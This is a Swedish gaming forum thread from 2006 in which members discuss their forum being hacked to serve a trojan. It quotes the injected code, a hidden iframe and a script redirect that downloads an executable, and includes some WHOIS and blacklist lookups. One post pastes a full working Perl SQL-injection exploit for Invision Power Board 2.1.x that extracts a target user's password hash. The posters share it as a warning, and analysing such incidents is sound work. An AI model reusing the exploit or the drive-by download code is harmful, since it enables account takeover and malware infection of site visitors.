rabarben Skrivet 2 maj, 2006 Rapportera Share Skrivet 2 maj, 2006 (redigerad) NÄr jag går in på gtasajten så kommer en liten ruta upp och om man trycker på den så får man trojanska hästar. Jag har fått ett program och det kommer några stycken trojaner nu som t.ex. paytime.exe. Här står det om trojanen! Redigerad 2 maj, 2006 av rabarben Länk till kommentar Dela på andra sidor More sharing options...
SlewME Skrivet 2 maj, 2006 Rapportera Share Skrivet 2 maj, 2006 Ja! RÅDER ALLA TILL ATT INTA TANKA DEN! Länk till kommentar Dela på andra sidor More sharing options...
rabarben Skrivet 2 maj, 2006 Skapat av Rapportera Share Skrivet 2 maj, 2006 Har startat en full system scan... hoppas jag får bort den. Tror ni sajten har blevet hackad elle r nåt? Länk till kommentar Dela på andra sidor More sharing options...
SlewME Skrivet 2 maj, 2006 Rapportera Share Skrivet 2 maj, 2006 Har startat en full system scan... hoppas jag får bort den. Tror ni sajten har blevet hackad elle r nåt? Trojanen har hackat kod i sajten ja. Alla får upp den där. Mitt antivirus informerade om att "terminate" filen. Länk till kommentar Dela på andra sidor More sharing options...
StellHell Skrivet 2 maj, 2006 Rapportera Share Skrivet 2 maj, 2006 can confirm the site has been hacked with the same hack as before, IFRAME in the User header linking to the exploit. Using a different browser is not the solution, getting rid of the goddamn virus is And why isn't that shit ass traffsale.biz site SHUT DOWN! These adware people are the scourge of the earth. I would like to break all of their fingers for coding this shit. Indeed, the board seems to have been exploited. Viewing the source yields this: CODE <iframe src="http://196.regvista.com/index.php?ref=wde" width="0" height="0" frameborder="0"></iframe> The URL in particular redirects to an affrontgl.com-address. Seems like it generates a unique one too, how considerate... However, the affrontgl.com nameservers seem quite unresponsive. Let's see if we can figure out more about them... CODE Domain Name: AFFRONTGL.COM Registrar: ONLINE SAS Whois Server: whois.bookmyname.com Referral URL: http://www.bookmyname.com Name Server: AA.CHARISMDE.COM Name Server: BB.CHARISMDE.COM Status: ACTIVE Updated Date: 05-mar-2006 Creation Date: 19-feb-2006 Expiration Date: 19-feb-2007 AA.CHARISMDE.COM A 219.72.229.209 bb.charismde.com A 220.248.227.112 Searching for nameservers with the same IP as the secondary yields the following: CODE BB.COBBLYEA.COM BB.CHARISMDE.COM DD.GROOMISHNL.COM AA.HERDSMANIF.COM AV.METEYARDBM.COM RR.GUSSIELJ.COM EE.VANGELIHN.COM BB.GALLICEN.COM CE.NICENISTCE.COM Let's ask spamhaus. CODE 219.72.229.209 is listed in the SBL, in the following records: SBL39300 Hmm, interesting (though not surprising). Let's see what they've been up to. CODE 219.72.229.209/32 is listed on the Register Of Known Spam Operations (ROKSO) database as being assigned to, under the control of, or providing service to a known professional spam operation http://www.spamhaus.org/sbl/sbl.lasso?query=SBL39300 Bah, spammers. Looking up 196.regvista.com (85.255.115.196) yields another record, SBL36702... CODE DNSChanger Trojan home http://vil.mcafeesecurity.com/vil/content/v_136602.htm Symptoms * Presence of the file: o %SYSTEMROOT%\SYSTEM32\HGQHP.EXE * Having DNS entries in any of your network adaptors with the values: o 85.255.112.132 o 85.255.113.13 * Finding traffic targeting: o 195.95.218.100 Hultan, var är du? Länk till kommentar Dela på andra sidor More sharing options...
GiZmo Skrivet 2 maj, 2006 Rapportera Share Skrivet 2 maj, 2006 Usch.. Längst ner i sidans källkod: <iframe src="index.php-filer/adv721.htm" height="1" width="1"></iframe> <script language="JavaScript">window.location.href = "http://traffsale1.biz/dl/loadadv721.exe"</script> Länk till kommentar Dela på andra sidor More sharing options...
tommy killer Skrivet 2 maj, 2006 Rapportera Share Skrivet 2 maj, 2006 Tänkte precis göra en topic om detta nu när jag kom hem efter skolan. Men tur arr mit SP2 varnade mig för att ladda ner filen. Länk till kommentar Dela på andra sidor More sharing options...
Tackleberry Skrivet 2 maj, 2006 Rapportera Share Skrivet 2 maj, 2006 Laddade man ner den får man fan skylla sig själv. Lite bör man ju kunna lista ut... Länk till kommentar Dela på andra sidor More sharing options...
SlewME Skrivet 2 maj, 2006 Rapportera Share Skrivet 2 maj, 2006 Laddade man ner den får man fan skylla sig själv. Lite bör man ju kunna lista ut... Måste hålla med dig. Det är inte ofta man lägger ut en fil för nerladdning rakt upp och ned på en hemsida om det inte är något lurt. Länk till kommentar Dela på andra sidor More sharing options...
iweX Skrivet 2 maj, 2006 Rapportera Share Skrivet 2 maj, 2006 Hur blir man av med den då? Länk till kommentar Dela på andra sidor More sharing options...
LoneWolF Skrivet 2 maj, 2006 Rapportera Share Skrivet 2 maj, 2006 (redigerad) Jag varnade Hultan för det här (eller så beror det på något annat) igår men han lyssnade/läste inte. Orsaken är förmodligen som följer: Idag gjordes en exploit tillgänglig till IPB-forumen. Jag ser att du inte visar direkt vilken version du kör men de som är kända för att ha hålet är 2.1.4 och förmodligen också 2.1.5. Exploiten utnyttjar PM för att komma över lösenordshashar från databasen som kan användas för att logga in på andras konton eller crackas för att få ut lösenordet. Jag rekommenderar att du antingen stänger ned forumet tills felet är fixat eller tillfälligt avaktiverar PM-funktionen. Det här är allvar, jag driver inte med dig, det har jag aldrig gjort förut. Här är koden: Invision Power Board <= 2.1.5 (from_contact) SQL Injection Exploit #!/usr/bin/perl ############################################################################# ## IPB <=2.1.4 exploit (possibly 2.1.5 too) ## ## Brought to you by the Ykstortion security team. ## ## ## ## The bug is in the pm system so you must have a registered user. ## ## The exploit will extract a password hash from the forum's data base of ## ## the target user. ## ## You need to know the target user's member ID but it's not difficult to ## ## find out, just look under their avatar next to one of their posts. ## ## Once you have the hash, simply unset all forum cookies and set ## ## member_id to the target user's member id and pass_hash to the hash ## ## obtained from the database by this script. ## ## ## ## Usage: ## ## $ ./ipb ## ## IPB Forum URL ? forums.example.com/forums ## ## Your username ? krypt_sk1dd13 ## ## Your pass ? if_your_on_nix_this_gets_hidden ## ## Target userid ? 3637 ## ## ## ## Attempting to extract password hash from database... ## ## 537ab2d5b37ac3a3632f5d06e8e04368 ## ## Hit enter to quit. ## ## ## ## Requirements: ## ## o Perl 5 ## ## o LWP 5.64 or later ## ## o Internet access ## ## o A forum you hate/dislike ## ## o A user on said forum ## ## o 32+ PMs left till your inbox is full, if not you can still delete ## ## PMs from your inbox as the successful ones come through ## ## ## ## Credit to: Nuticulus for finding the SQL injection ## ## ## ## Have fun, you dumb skiddie. ## ############################################################################# use HTTP::Cookies; use LWP 5.64; use HTTP::Request; # variables my $login_page = '?act=Login&CODE=01'; my $pm_page = '?act=Msg&CODE=04'; my $pose_pm_page = '?'; my $tries = 5; my $sql = ''; my $hash = ''; my $need_null = 0; my $i; my $j; my @charset = ('0' .. '9', 'a' .. 'f'); my %form = (act => 'Msg', CODE => '04', MODE => '01', OID => '', removeattachid => '', msg_title => 'asdf', bbmode => 'normal', ffont => 0, fsize => 0, fcolor => 0, LIST => ' LIST ', helpbox => 'Insert Monotype Text (alt + p)', tagcount => 0, Post => 'jkl'); # objects my $ua = LWP::UserAgent->new; my $cj = HTTP::Cookies->new (file => "N/A", autosave => 0); my $resp; # init the cookie jar $ua->cookie_jar ($cj); # allow redirects on post requests push @{ $ua->requests_redirectable }, "POST"; # get user input print 'IPB Forum URL ? '; chomp (my $base_url = <STDIN>); print 'Your username ? '; chomp (my $user = <STDIN>); $form{entered_name} = $user; print 'Your pass ? '; # systems without stty will error otherwise my $stty = -x '/bin/stty'; system 'stty -echo' if $stty; # to turn off echoing chomp (my $pass = <STDIN>); system 'stty echo' if $stty; # to turn it back on print "\n" if $stty; print 'Target userid ? '; # it'll say next to one of their posts chomp (my $tid = <STDIN>); # parse the given base url if ($base_url !~ m#^http://#) { $base_url = 'http://' . $base_url } if ($base_url !~ m#/$|index\.php$#) { $base_url .= '/' } do { $resp = $ua->post ($base_url . $login_page, [ UserName => $user, PassWord => $pass, CookieDate => 1, ]); } while ($tries-- && !$resp->is_success()); # reset tries $tries = 5; # did we get 200 (OK) ? if (!$resp->is_success()) { die 'Error: ' . $resp->status_line . "\n" } # was the pass right ? if ($resp->content =~ /sorry, the password was wrong/i) { die "Error: password incorrect.\n"; } # get ourselves a post_key (and an auth_key too with newer versions) do { $resp = $ua->get ($base_url . $pm_page); } while ($tries-- && !$resp->is_success()); # reset tries $tries = 5; if (!$resp->is_success()) { die 'Error: ' . $resp->status_line . "\n" } if ($resp->content =~ m#<input\s+?type=["']?hidden["']?\s+?name=["']?post_key["']?\s+?value=["']?([0-9a-f]{32})["']?\s+?/>#) { $form{post_key} = $1; } else { die "Error: couldn't get a post key.\n"; } if ($resp->content =~ m#<input\s+?type=["']?hidden["']?\s+?name=["']?auth_key["']?\s+?value=["']?([0-9a-f]{32})["']?\s+/>#) { $form{auth_key} = $1; } # turn off buffering so chars in the hash show up straight away $| = 1; print "\nAttempting to extract password hash from database...\n "; OFFSET: for ($i = 0; $i < 32; ++$i) { CHAR: for ($j = 0; $j < @charset; ++$j) { # reset tries $tries = 5; print "\x08", $charset[$j]; # build sql injection $sql = '-1 UNION SELECT ' . ($need_null ? '0, ' : '') . 'CHAR(' . (join (',', map {ord} split ('', $user))) . ') FROM ' . 'ibf_members WHERE id = ' . $tid . ' AND MID(' . 'member_login_key, ' . ($i + 1) . ', 1) = CHAR(' . ord ($charset[$j]) . ')'; $form{from_contact} = $sql; $resp = $ua->post ($base_url . $post_pm_page, \%form, referer => $base_url . $pm_page); if (!$resp->is_success()) { die "\nError: " . $resp->status_line . "\n" if (!$tries); --$tries; redo; } if ($resp->content =~ /sql error/i) { if ($need_null) { die "Error: SQL error.\n"; } else { $need_null = 1; redo OFFSET; } } elsif ($resp->content !~ /there is no such member/i) { # we have a winner ! print ' '; next OFFSET; } } # uh oh, something went wrong die "\nError: couldn't get a char for offset $i\n"; } print "\x08 \x08\nHit enter to quit.\n"; <STDIN>; Nu när koden till och med är publicerad publikt så MÅSTE någonting göras, varken medlemmarnas/moderatorernas/administratörernas konton, lösenord eller personliga uppgifter går säkra, nej inte ens webbservern verkar det som. Ta forumet offline, avaktivera PM-systemet som en temporär fix och uppmana ALLA att byta lösenord när problemet är ur världen. Redigerad 2 maj, 2006 av LoneWolF Länk till kommentar Dela på andra sidor More sharing options...
Vice. Skrivet 2 maj, 2006 Rapportera Share Skrivet 2 maj, 2006 Kan någon berätta EXAKT VAD, det är som händer? Man fick upp ett erbjudande att ladda ner nått. Och? Vad är det vi har att göra med? Är det ett virus som härjar på forumet som kan ta över ens konto? Och vad händer då? Eller är detta bara en överdriven hysterì??? LoneWolF: Hur kännde DU till detta IGÅR?? Länk till kommentar Dela på andra sidor More sharing options...
StellHell Skrivet 2 maj, 2006 Rapportera Share Skrivet 2 maj, 2006 Kan någon berätta EXAKT VAD, det är som händer? Man fick upp ett erbjudande att ladda ner nått. Och? Vad är det vi har att göra med? Är det ett virus som härjar på forumet som kan ta över ens konto? Och vad händer då? Eller är detta bara en överdriven hysterì??? LoneWolF: Hur kännde DU till detta IGÅR?? Andra IPB forum blev infekterade igår och i förrgår. Länk till kommentar Dela på andra sidor More sharing options...
LoneWolF Skrivet 2 maj, 2006 Rapportera Share Skrivet 2 maj, 2006 Det är inte överdrivet, databasen läcker lösenord från användarkonton samtidigt som en massa andra problem upptäckts. Varför gör ni inget? Medlemmarnas personliga data är ju i fara. Länk till kommentar Dela på andra sidor More sharing options...
SlewME Skrivet 2 maj, 2006 Rapportera Share Skrivet 2 maj, 2006 Det är inte överdrivet, databasen läcker lösenord från användarkonton samtidigt som en massa andra problem upptäckts. Varför gör ni inget? Medlemmarnas personliga data är ju i fara. Ja, mitt personnummer blandannat. Kommer det ut så stämmer jag den här sajten. Hultan är extremt inaktiv och därför händer inget. Administratörerna på GTAsajten har inga förmåner att ändra på forumet eller sidan. Länk till kommentar Dela på andra sidor More sharing options...
-NightHawk- Skrivet 2 maj, 2006 Rapportera Share Skrivet 2 maj, 2006 (redigerad) Det här är kanske det sjuka fenomenet så när den där grabben med den sjuka tråden skrev att "21.00 händer det" eller nåt sånt. Qoutar mig själv från den andra tråden: Tack gode Gud att jag har Norton! Gick in på GTAsajten nyss och ja den bara: "Deleted trojan bla bla bla." Jag bara: Va? DAMN YOU BERKLEY! (nej, inte det) så om jag inte hade haft Norton så hade allting varit fucked upp. Fick ingen popup utan jag kom in och direkt kom meddelandet! Redigerad 2 maj, 2006 av -NightHawk- Länk till kommentar Dela på andra sidor More sharing options...
RadiuZ Skrivet 2 maj, 2006 Rapportera Share Skrivet 2 maj, 2006 Är det fixat nu? Jag har nämligen inte fått något. Använder Opera men enligt någon quote skulle inte det spela någon roll. Länk till kommentar Dela på andra sidor More sharing options...
Vice. Skrivet 2 maj, 2006 Rapportera Share Skrivet 2 maj, 2006 Men har någon kontaktat Hultenius då? StellHell, du nämde att du skulle göra det. Hur har du gjort det? Har han någon mail som han tittar i? Länk till kommentar Dela på andra sidor More sharing options...
StellHell Skrivet 2 maj, 2006 Rapportera Share Skrivet 2 maj, 2006 Men har någon kontaktat Hultenius då? StellHell, du nämde att du skulle göra det. Hur har du gjort det? Har han någon mail som han tittar i? Har snokat på irc och msn utan resultat. Har även skickat ett par mail om han nu ser dom. Får se vad som händer. Länk till kommentar Dela på andra sidor More sharing options...
[B][O][T] Skrivet 3 maj, 2006 Rapportera Share Skrivet 3 maj, 2006 Eftersom den andra tråden blev låst får Jag väl lägga in citaten här istället och svara på Vice's fråga. Vi har inget med att skriva regler att göra. Bara Hultenius som har den möjligheten. Tycker det är dåligt att Ni inte kan göra det, när Hultan inte är särskilt aktiv här : Varför är det dåligt?! Vem är dem att ändra reglerna på ett ställe som de inte ens äger? När en administratör inte är särskilt aktiv så borde någon annan kunna sköta det administrativa, det finns alltid något att fixa. Ta bara det som hände igår, hade någon annan utav adminen haft fullständig tillgång så hadde de lätt kunna göra forumet offline med ett meddelande om att forumet är temporärt stängt pga virus. Och på det sättet stoppat att medlemmar får sina datorer infekterade. Detta forum är så stort att det inte räcker med en admin, nu räknar jag inte med de som är admin (Stellan & KalleR) iom att de inte har tillgång till allt. Så länge man kan lita på någon till 100% i alla lägen så ska det inte vara några problem. BOT Länk till kommentar Dela på andra sidor More sharing options...
Recommended Posts